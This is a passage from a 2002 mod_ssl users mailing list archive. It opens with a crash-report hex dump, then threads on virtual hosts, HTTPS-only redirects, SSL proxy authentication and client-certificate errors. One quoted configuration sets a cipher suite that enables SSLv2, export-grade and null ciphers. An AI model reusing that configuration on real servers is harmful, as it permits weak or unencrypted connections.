ff ff 9b b2 f6 6f - d4 01 00 00 cd b3 f6 6f .......o.......o 03dcff40 00 00 00 00 00 4c 7d 00 - 00 4c 7d 00 00 00 00 00 .....L}..L}..... 03dcff50 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 03dcff60 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 03dcff70 20 47 99 00 00 00 00 00 - 00 00 00 00 b8 ff dc 03 G.............. 03dcff80 4a b3 f6 6f 31 00 00 00 - 20 38 00 78 31 00 00 00 J..o1... 8.x1... 03dcff90 00 00 00 00 00 00 00 00 - 00 4c 7d 00 00 00 00 00 .........L}..... 03dcffa0 90 ff dc 03 8b 74 11 80 - dc ff dc 03 bc e9 00 78 .....t.........x 03dcffb0 c0 12 03 78 00 00 00 00 - ec ff dc 03 de 4e f0 77 ...x.........N.w 03dcffc0 00 4c 7d 00 00 00 00 00 - 00 00 00 00 00 4c 7d 00 .L}..........L}. 03dcffd0 00 00 00 00 c4 ff dc 03 - 00 00 00 00 ff ff ff ff ................ 03dcffe0 44 b9 f3 77 38 d2 f3 77 - 00 00 00 00 00 00 00 00 D..w8..w........ 03dcfff0 00 00 00 00 c5 37 00 78 - 00 4c 7d 00 00 00 00 00 .....7.x.L}..... 03dd0000 07 00 00 00 02 01 00 00 - ee ff ee ff 00 00 00 00 ................ 03dd0010 00 00 7b 00 00 a0 1c 00 - 00 00 dd 03 00 02 00 00 ..{............. 03dd0020 38 00 dd 03 00 00 fd 03 - d0 01 00 00 03 00 00 00 8............... -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Cliff Woolley Sent: Wednesday, February 13, 2002 1:55 PM To: modssl-users@modssl.org Subject: Re: Apache Access Violation On Wed, 13 Feb 2002, c2z4s9 wrote: > If you are interested I have the NT error info as well (very long and > confusing to me). Yes, that's important information. Please post it if it's not incredibly long, or at least email it to me directly at jwoolley@apache.org. Thanks, --Cliff -------------------------------------------------------------- Cliff Woolley Charlottesville, VA ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 06:10:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA23034; Thu, 14 Feb 2002 06:09:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ns.magvtb.ru id GAA22441; Thu, 14 Feb 2002 06:08:15 +0100 (MET) Received: from 217.107.55.130 (sierra.magvtb.ru [217.107.55.130]) (authenticated) by ns.magvtb.ru (8.11.3/8.11.3) with ESMTP id g1E59BM45892 for ; Thu, 14 Feb 2002 16:09:12 +1100 (MAGT) Date: Thu, 14 Feb 2002 16:04:11 +1100 From: "Andrew V. Sirotkin" X-Mailer: The Bat! (v1.47 Halloween Edition) Personal X-Priority: 3 (Normal) Message-ID: <18126485554.20020214160411@magadan.ru> To: modssl-users@modssl.org Subject: VirtualServers config for SSL Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Andrew V. Sirotkin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, All! I want to use some VirtualServers on port 80 and _default_ VirtualServer on 443 on demand. I used Listen 80 Listen 443 ... NameVirtualHost host.net:80 ... SSLEngine on ..... ... ..... When I brows host.net by 443 I get a good result (certificate & etc.) When I attempt to connect by 80 port to _default_ I get VServer. How can I solve this task? Thanks for a help... Andrew V. Sirotkin mailto:avs@magadan.ru 7(41322)97498 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 10:02:01 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA03161; Thu, 14 Feb 2002 10:01:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bull1.bourse.ch id KAA03139; Thu, 14 Feb 2002 10:00:25 +0100 (MET) Received: (from nobody@localhost) by bull1.bourse.ch (8.8.8+Sun/8.8.8) id KAA08478 for ; Thu, 14 Feb 2002 10:00:14 +0100 (MET) X-Authentication-Warning: bull1.bourse.ch: nobody set sender to using -f Received: from trifid2(172.20.196.132) by bull1 via smap (V2.1) id xma008405; Thu, 14 Feb 02 10:00:06 +0100 Received: from regulus.bourse.ch (regulus [172.20.196.148]) by trifid2.bourse.ch (8.8.8+Sun/8.8.8) with ESMTP id KAA08154 for ; Thu, 14 Feb 2002 10:00:04 +0100 (MET) Received: from bourse.ch (localhost [127.0.0.1]) by regulus.bourse.ch (8.9.3+Sun/8.9.3) with ESMTP id KAA07918 for ; Thu, 14 Feb 2002 10:00:02 +0100 (MET) Message-ID: <3C6B7C92.B2EE3100@bourse.ch> Date: Thu, 14 Feb 2002 10:00:02 +0100 From: Owen Boyle X-Mailer: Mozilla 4.76 [en] (X11; U; SunOS 5.8 sun4u) X-Accept-Language: en MIME-Version: 1.0 To: modssl-users@modssl.org Subject: Re: VirtualServers config for SSL References: <18126485554.20020214160411@magadan.ru> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Owen Boyle X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users "Andrew V. Sirotkin" wrote: > > Hello, All! > > I want to use some VirtualServers on port 80 and _default_ > VirtualServer on 443 on demand. I used > > > Listen 80 > Listen 443 > > ... > NameVirtualHost host.net:80 > ... > > SSLEngine on > ..... > > ... > > ..... > > > When I brows host.net by 443 I get a good result (certificate & etc.) > When I attempt to connect by 80 port to _default_ I get VServer. > How can I solve this task? This is correct behaviour - what do you want to happen? Do you want to get the SSL site via plain HTTP (port 80) as well? Rgds, Owen boyle. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 10:34:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA04722; Thu, 14 Feb 2002 10:33:10 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop3.sttl.uswest.net id KAA04704; Thu, 14 Feb 2002 10:32:52 +0100 (MET) Received: (qmail 10725 invoked by alias); 14 Feb 2002 09:32:49 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 10713 invoked by uid 0); 14 Feb 2002 09:32:49 -0000 Received: from sttldslgw34poolb109.sttl.uswest.net (HELO wmtiabertj) (65.102.185.109) by sttlpop3.sttl.uswest.net with SMTP; 14 Feb 2002 09:32:49 -0000 From: "SoilentG" To: Subject: what's the best way force a server to be HTTPS only? Date: Thu, 14 Feb 2002 01:35:46 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have an IP based virtual server that is defined like this: in Vhosts.conf: ServerName myvirtual.domain ... ... ... AllowOverride None Options +ExecCGI -Indexes and in ssl.default-vhost.conf ServerName myvirtual.domain ... ... .. SSLEngine on SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL SSLCertificateFile conf/ssl/virt/server.crt SSLCertificateKeyFile conf/ssl/virt/server.key SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown CustomLog logs/ssl_request_log \ "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" RewriteEngine On RewriteOptions inherit and it works fine, port 80, standard... port 443 SSL. But I've decided that I want to force it to be SSL only. So I have some questions: 1) Am I silly to have dual vhost def's one in Vhost.conf and the other in mod-ssl.conf? 2) What's the best way to force it to be SSL only... a)close port 80? b)remove def from Vhost.conf? c)all of the above? d)other way that I can't think of? Thanks, Jeff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 10:42:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA05104; Thu, 14 Feb 2002 10:41:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id KAA05078; Thu, 14 Feb 2002 10:40:59 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16bINu-0003Nn-00 for modssl-users@modssl.org; Thu, 14 Feb 2002 10:40:58 +0100 To: modssl-users@modssl.org Subject: Re: what's the best way force a server to be HTTPS only? Message-ID: <1013679658.3c6b862a96680@webmail.regiocom.net> Date: Thu, 14 Feb 2002 10:40:58 +0100 (CET) From: NickM References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Try something like: ServerName myvirtual.domain SSLEngine on Redirect / https://myvirtual.domain/ Quoting SoilentG : > I have an IP based virtual server that is defined like this: > > in Vhosts.conf: > > > ServerName myvirtual.domain > ... > ... > ... > > AllowOverride None > Options +ExecCGI -Indexes > > > > and in ssl.default-vhost.conf > > > ServerName myvirtual.domain > ... > ... > .. > SSLEngine on > SSLCipherSuite > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > SSLCertificateFile conf/ssl/virt/server.crt > SSLCertificateKeyFile conf/ssl/virt/server.key > SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown > CustomLog logs/ssl_request_log \ > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > RewriteEngine On > RewriteOptions inherit > > > and it works fine, port 80, standard... port 443 SSL. > > But I've decided that I want to force it to be SSL only. > > So I have some questions: > > 1) Am I silly to have dual vhost def's one in Vhost.conf > and the other in mod-ssl.conf? > 2) What's the best way to force it to be SSL only... > a)close port 80? > b)remove def from Vhost.conf? > c)all of the above? > d)other way that I can't think of? > > Thanks, > > Jeff > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 10:49:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA05370; Thu, 14 Feb 2002 10:48:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop3.sttl.uswest.net id KAA05348; Thu, 14 Feb 2002 10:47:24 +0100 (MET) Received: (qmail 20791 invoked by alias); 14 Feb 2002 09:47:23 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 20786 invoked by uid 0); 14 Feb 2002 09:47:22 -0000 Received: from sttldslgw34poolb109.sttl.uswest.net (HELO wmtiabertj) (65.102.185.109) by sttlpop3.sttl.uswest.net with SMTP; 14 Feb 2002 09:47:22 -0000 From: "SoilentG" To: Subject: RE: what's the best way force a server to be HTTPS only? Date: Thu, 14 Feb 2002 01:50:19 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: <1013679658.3c6b862a96680@webmail.regiocom.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks and just to be clear...(sorry I'm pretty new) this part goes in Vhosts.conf? Redirect / https://myvirtual.domain/ Jeff > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of NickM > Sent: Thursday, February 14, 2002 1:41 AM > To: modssl-users@modssl.org > Subject: Re: what's the best way force a server to be HTTPS only? > > > Try something like: > > ServerName myvirtual.domain > SSLEngine on > > > > Redirect / https://myvirtual.domain/ > > > > > Quoting SoilentG : > > > I have an IP based virtual server that is defined like this: > > > > in Vhosts.conf: > > > > > > ServerName myvirtual.domain > > ... > > ... > > ... > > > > AllowOverride None > > Options +ExecCGI -Indexes > > > > > > > > and in ssl.default-vhost.conf > > > > > > ServerName myvirtual.domain > > ... > > ... > > .. > > SSLEngine on > > SSLCipherSuite > > ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > SSLCertificateFile conf/ssl/virt/server.crt > > SSLCertificateKeyFile conf/ssl/virt/server.key > > SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-shutdown > > CustomLog logs/ssl_request_log \ > > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > > RewriteEngine On > > RewriteOptions inherit > > > > > > and it works fine, port 80, standard... port 443 SSL. > > > > But I've decided that I want to force it to be SSL only. > > > > So I have some questions: > > > > 1) Am I silly to have dual vhost def's one in Vhost.conf > > and the other in mod-ssl.conf? > > 2) What's the best way to force it to be SSL only... > > a)close port 80? > > b)remove def from Vhost.conf? > > c)all of the above? > > d)other way that I can't think of? > > > > Thanks, > > > > Jeff > > > > ______________________________________________________________________ > > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 11:47:06 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA08610; Thu, 14 Feb 2002 11:46:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id LAA08582; Thu, 14 Feb 2002 11:45:42 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16bJOS-0003Q7-00 for modssl-users@modssl.org; Thu, 14 Feb 2002 11:45:36 +0100 To: modssl-users@modssl.org Subject: RE: what's the best way force a server to be HTTPS only? Message-ID: <1013683536.3c6b9550aca45@webmail.regiocom.net> Date: Thu, 14 Feb 2002 11:45:36 +0100 (CET) From: NickM References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Yse it will replace your standard port 80 one, therefore setting anything not defined to redirect to the standard https site. I did make one slight minor mistake there, take the trailing slash off as it will be there already from the path transferred. So instead have: Redirect / https://myvirtual.domain Nick Quoting SoilentG : > Thanks and just to be clear...(sorry I'm pretty new) > > this part goes in Vhosts.conf? > > > Redirect / https://myvirtual.domain/ > > > Jeff ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 12:18:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA11133; Thu, 14 Feb 2002 12:17:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from sttlpop3.sttl.uswest.net id MAA11112; Thu, 14 Feb 2002 12:16:38 +0100 (MET) Received: (qmail 16317 invoked by alias); 14 Feb 2002 11:16:36 -0000 Delivered-To: fixup-modssl-users@modssl.org@fixme Received: (qmail 16312 invoked by uid 0); 14 Feb 2002 11:16:36 -0000 Received: from sttldslgw34poolb109.sttl.uswest.net (HELO wmtiabertj) (65.102.185.109) by sttlpop3.sttl.uswest.net with SMTP; 14 Feb 2002 11:16:36 -0000 From: "SoilentG" To: Subject: RE: what's the best way force a server to be HTTPS only? Date: Thu, 14 Feb 2002 03:19:33 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal In-Reply-To: <1013683536.3c6b9550aca45@webmail.regiocom.net> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "SoilentG" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users THANKS! > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of NickM > Sent: Thursday, February 14, 2002 2:46 AM > To: modssl-users@modssl.org > Subject: RE: what's the best way force a server to be HTTPS only? > > > Yse it will replace your standard port 80 one, therefore setting > anything not > defined to redirect to the standard https site. > > I did make one slight minor mistake there, take the trailing > slash off as it > will be there already from the path transferred. So instead have: > > > Redirect / https://myvirtual.domain > > > Nick > > > Quoting SoilentG : > > > Thanks and just to be clear...(sorry I'm pretty new) > > > > this part goes in Vhosts.conf? > > > > > > Redirect / https://myvirtual.domain/ > > > > > > Jeff > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 15:57:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA20943; Thu, 14 Feb 2002 15:56:17 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from shipyard.proteome.com id PAA20930; Thu, 14 Feb 2002 15:55:52 +0100 (MET) Received: from proteus.proteome.com (mailhost.proteome.com [209.192.182.162]) by shipyard.proteome.com (8.10.1/8.10.1) with ESMTP id g1EF1bA07363 for ; Thu, 14 Feb 2002 10:01:38 -0500 (EST) Received: from whaler.proteome.com (whaler.proteome.com [10.203.1.71]) by proteus.proteome.com (8.10.1/8.10.1) with ESMTP id g1EEtoY27930 for ; Thu, 14 Feb 2002 09:55:50 -0500 (EST) Received: (from kylet@localhost) by whaler.proteome.com (8.10.1/8.10.1) id g1EEto525372 for modssl-users@modssl.org; Thu, 14 Feb 2002 09:55:50 -0500 (EST) From: "Kyle Tucker" Message-Id: <1020214095550.ZM25370@whaler> Date: Thu, 14 Feb 2002 09:55:50 -0500 X-Mailer: Z-Mail (5.0.0 30July97) To: modssl-users@modssl.org Subject: Can Apache proxy authentication be done via SSL? MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kyle Tucker" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, I am trying to set up Apache as a proxy server and have people authenticate (407 Proxy-Authenticate) via SSL and basic auth so the passwords are not sent clear text. The SSL works fine directly as a web server and mod_proxy works for normal HTTP traffic, but I can't seem to get authentication to work via SSL. I am trying a bunch of combinations, even setting the browser (Netscape 4.72) proxy port to 443, but for the most part all I get is failures with "Hint: speaking HTTP to HTTPS port!" in the logs. So before I continue to work on this, I just want to know is if it's even possible to make this work via SSL? If so,any hints greatly appreciated. This is Apache 1.3.23, mod_ssl-2.8.6-1.3.23 and openssl-0.9.6c on Solaris 8. Thanks. -- - Kyle ---------------------------------------------------------------------- Kyle Tucker - Manager of IT Tel: (978) 816-0229 Incyte Genomics - Proteome Division Fax: (978) 922-3971 100 Cummings Center, Suite 420B Email - kylet@incyte.com Beverly, MA 01915 Web - http://www.incyte.com ---------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 16:09:22 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA21765; Thu, 14 Feb 2002 16:08:04 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id QAA21748; Thu, 14 Feb 2002 16:07:32 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 57CDE4CE715; Thu, 14 Feb 2002 16:07:32 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1EEKl604422; Thu, 14 Feb 2002 15:20:47 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mailgw.office.sourceree.com id OAA17158; Thu, 14 Feb 2002 14:45:34 +0100 (MET) Received: from devpc201 (tech201.internal.sourceree.com [192.168.215.70]) by mailgw.office.sourceree.com (8.9.3/8.9.3) with SMTP id NAA11105 for ; Thu, 14 Feb 2002 13:29:39 GMT From: "Santosh Deshpande" To: "Modssl-Users@Modssl. Org" Subject: Multiple Apache servers on a single server Date: Thu, 14 Feb 2002 13:49:51 -0000 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600 Importance: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Santosh Deshpande" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi All, I would like to start two 'Apache servers instances' on a single machine. One is to use SSL and the other without SSL. But unfortunately, I can not start the SSL enabled Apache. Here is how the server/conf file looks like. Server: RHLinux, has 2 IP address ( 10.20.30.1 and 10.20.30.2 ) httpd-ssl.conf : Listen 10.20.30.1:443 NameVirtuaHost 10.20.30.1:443 ServerName www.mydmain.com .... httpd-nossl.conf : Listen 10.20.30.1:80 NameVirtuaHost 10.20.30.2:80 ServerName dtd.mydmain.com .... Startup scripts: daemon /usr/sbin/httpd -f /usr/local/apache/conf/httpd-ssl/httpd-ssl.conf -D SSL daemon /usr/sbin/httpd -f /usr/local/apache/conf/httpd-nossl/httpd-nossl.conf With this I can get only the httpd without SSL working. I can not start the httpd with SSL. It comes up with errors { [Thu Feb 14 12:35:13 2002] [crit] (98)Address already in use: make_sock: could not bind to address 10.20.30.1 port443 ]} though there is nothing happening on 443. ---------------------------------- Additional Info: 1. With a single file that includes both the vhost (httpd.conf), it works. ( I can access www.mydmain.com securely while dtd.mydmain.com in the non secure way) 2. The httpd.conf is in default location and I use 'apachectl startssl' to startup. 3. DocumentRoot/ Log destinations are specified correctly ( absolute path) appreciate your help. Santosh ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 18:18:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA00311; Thu, 14 Feb 2002 18:17:44 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from gristlepit.com id SAA00131; Thu, 14 Feb 2002 18:16:59 +0100 (MET) Received: (qmail 17305 invoked by uid 509); 14 Feb 2002 17:16:54 -0000 Date: Thu, 14 Feb 2002 11:16:53 -0600 From: Ron Ridley To: modssl-users@modssl.org Subject: ErrorDocuments and SSLVerifyClient Message-ID: <20020214171653.GA17197@gristlepit.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.25i X-Operating-System: Linux 2.2.17-21mdk X-URL: http://www.gristlepit.com/ron Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Ron Ridley X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I have apache 1.22 w/ mod_ssl 2.8.5 running on NT from the contribs directory on modssl.org. I have the server configured to require a certificate through the 'SSLVerifyClient require' directive. My users can get in fine, however if they have no certificate or a revoked certificate, they get an IE error page (Cannot find server or DNS error). The apache and ssl error logs note that: SSL handshake failed: HTTP spoken on HTTPS port; trying to send HTML error page (OpenSSL library error follows) This is done every time the user gets the error page. I set up an Alias to a directory containing custom error pages. I also setup multiple ErrorDocument directives to refer to the alias. I can access the error pages manually, but I am unsure on how to get them to show up when the certificate prompt fails. I have tried all of the IE related fixes in the FAQ (SetEnvIf, etc), and I still have not been successful in getting the error messages to show up. Here is the catch to this: My webserver can run on one port only(888) and I have no VirtualHosts. In my test environment I have set them up, but I get a handshake renegotiation error instead of the http->https error. Any ideas? ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 21:25:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA18913; Thu, 14 Feb 2002 21:23:59 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from spong.regiocom.net id VAA18705; Thu, 14 Feb 2002 21:22:23 +0100 (MET) Received: from web by spong.regiocom.net with local (Exim 3.13 #1) id 16bSOa-0003j7-00 for modssl-users@modssl.org; Thu, 14 Feb 2002 21:22:20 +0100 To: modssl-users@modssl.org Subject: Re: Can Apache proxy authentication be done via SSL? Message-ID: <1013718140.3c6c1c7cb61c0@webmail.regiocom.net> Date: Thu, 14 Feb 2002 21:22:20 +0100 (CET) From: NickM References: <1020214095550.ZM25370@whaler> In-Reply-To: <1020214095550.ZM25370@whaler> MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 8bit User-Agent: IMP/PHP IMAP webmail program 2.2.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: NickM X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Im not skilled in this at all, but thought I throw a few thoughts down. OK, if I understand you. You have a standard server and have set a proxy dir to an secure server. well I dont expect that to work as the browser will still be talking http to the proxy which simply passes it on. I think what would be better is one of two things. Have the password entry page on the secure server and then redirect back on authenticated. Or, in the way hotmail does it, have some javascript to post the details to the secure server and then again redirect back to normal (either to re-enter or to entry pages). It doesnt matter if the port is 443 that the proxy is on if its not speaking ssl, youd need that server to have an ssl version of the server and then redirect any non secure requests to the https alternative and then proxy from there. But I still dont see why the proxy in the first place, why not directly access it seeing as its only for the password authentication. Nick Quoting Kyle Tucker : > Hi, > I am trying to set up Apache as a proxy server and have > people authenticate (407 Proxy-Authenticate) via SSL and basic auth > so the passwords are not sent clear text. The SSL works fine directly > as a web server and mod_proxy works for normal HTTP traffic, but I > can't seem to get authentication to work via SSL. I am trying a bunch > of combinations, even setting the browser (Netscape 4.72) proxy port > to 443, but for the most part all I get is failures with "Hint: > speaking > HTTP to HTTPS port!" in the logs. So before I continue to work on > this, > I just want to know is if it's even possible to make this work via > SSL? > If so,any hints greatly appreciated. This is Apache 1.3.23, > mod_ssl-2.8.6-1.3.23 and openssl-0.9.6c on Solaris 8. Thanks. > > > -- > - Kyle > ---------------------------------------------------------------------- > Kyle Tucker - Manager of IT Tel: (978) 816-0229 > Incyte Genomics - Proteome Division Fax: (978) 922-3971 > 100 Cummings Center, Suite 420B Email - kylet@incyte.com > Beverly, MA 01915 Web - http://www.incyte.com > ---------------------------------------------------------------------- > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Feb 14 21:46:49 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA21319; Thu, 14 Feb 2002 21:46:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe000.worldonline.dk id VAA21228; Thu, 14 Feb 2002 21:45:06 +0100 (MET) Received: (qmail 2927 invoked by uid 0); 14 Feb 2002 20:44:59 -0000 Received: from 